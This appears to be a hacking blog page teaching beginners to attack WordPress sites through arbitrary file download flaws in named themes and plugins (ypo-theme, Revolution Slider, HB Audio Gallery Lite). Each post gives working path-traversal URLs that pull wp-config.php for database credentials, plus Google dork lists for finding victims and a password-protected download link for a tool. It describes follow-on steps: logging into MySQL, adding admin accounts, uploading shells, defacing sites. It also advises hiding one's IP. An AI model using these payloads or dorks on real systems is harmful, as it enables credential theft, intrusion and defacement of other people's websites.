Showing posts with label Wordpress Exploit. Show all posts
Showing posts with label Wordpress Exploit. Show all posts

Exploit Theme ypo-theme Vulnerabiliy Wordpress Site

        Exploit Theme ypo-theme Vulnerabiliy Wordpress

Hello everyone Today I wanna show you New Exploit Theme Wordpress Vulnerability

so you know ready about how to use it to Exploit and but for newbie you check my video Basic Exploit

in my Tutorial you should subcribe my channel youtube and Like my Page get more Vulnerability CMS Wordpress , Joomla , Drupal more .....

##############################################################
# Exploit Title: WordPress Theme ypo-theme Arbitrary File Download Vulnerability
# Dork : inurl:/wp-content/themes/ypo-theme/
# Date : 2016/07/25
# Tested on : Kali Linux 2
# Category: webapps
##############################################################
#
# http://www.site.com/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php
#############################################################

                    Video Demo Exploit Theme ypo-theme




Content us : Here  

Thank for visit I hope see you soon...............

Exploiter Config Download Tool Wordpress Vulnerability

Exploiter Config Download Tool Wordpress Vulnerability

 

Hello Friend Today I will show you How to Exploit Config Download Tool It is old tool but still work very nice so I hope you enjoy with my Website and Youtube channel free something news
I hope you becareful...

 Google Dork Exploit with Revsilder So when you watch my video you will know about That !!


inurl:wp-content/plugins/revslider/

inurl:revslider

inurl:revslider_admin.php

inurl:revslider_front.php

inurl:plugins/revslider/

intext:Powered by Revslider

intitle:"Index Of/ revslider"

intitle:"Index Of/wp-content/themes/revslider"

intitle:"Index Of/wp-content/plugins/revslider"

intitle:"Index Of/admin/revslider"

intitle:"Index Of/fr/revslider"

intitle:"Index Of/en/revslider"

intitle:"Index Of/us/revslider"

intitle:"Index Of/ar/revslider"

intitle:"Index Of/es/revslider"

intitle:"Index Of/de/revslider"

                            Video Demo Exploit

                         Don't forget subcribe my channel get more Tutorial                      

            

 

Now you Download Tool : Here

Password Winrar : dedsectool 

I hope you agree my english skilll !!

Content us : Here  

Thank for visit I hope see you soon...............




 

WordPress Themes admin-ajax.php - Arbitrary File Download

WordPress Themes admin-ajax.php - Arbitrary File Download

Hello everyone This is good exploit vulnerability. It's old vulnerability but it still work verywell
How you can get? You can get download vulnerability mysql account and then you can connect or login mysql
you can do something when you login successfully like add new account wordpress and upload shell... and deface website target.

                                     Video Demo

                   

                      

# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# WordPress IncredibleWP Theme Arbitrary File Download
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/

# WordPress Ultimatum Theme Arbitrary File Download
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Google Dork: "Index of" +/wp-content/themes/ultimatum

# WordPress Medicate Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Google Dork: "Index of" +/wp-content/themes/medicate/

# WordPress Centum Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Google Dork: "Index of" +/wp-content/themes/Centum/

# WordPress Avada Theme Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Google Dork: "Index of" +/wp-content/themes/Avada/

# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Google Dork: "Index of" +/wp-content/themes/striking_r/

# WordPress Beach Apollo Arbitrary File Download
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/


PoC:

http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php





Thank for visit I hope see you soon...............

Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download

Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download


EXPLOIT : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10

When u Pentest Website Note : You should Hide your IP to Protect yourself !! 

Link Tool Hide IP and Tutorial How to Hide IP :

Use dork to help you find vulnerability site just use google or other search to find Vulnerability past on google or other search inurl:/wp-content/plugins/hb-audio-gallery-lite

Pic 1


Example this URLsite i just test vulnerability or not it will show you like Pic 4 you will get wp-config.php 
Pic 2

Let's POC :www.victim site.com /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 

Pic 3

when POC is past like this you will get wp-config.php 
Pic 4


then open it with notpad you willl get account mysql next tutorial will to show you how to connect


Sorry about my english but i hope you guy understand if you don't understand you comment below Thank<3
Good luck My Brother and Sister !


If not work content my Facebook Page : Here   

Thank for visit I hope see you soon...............

BY : dedsectool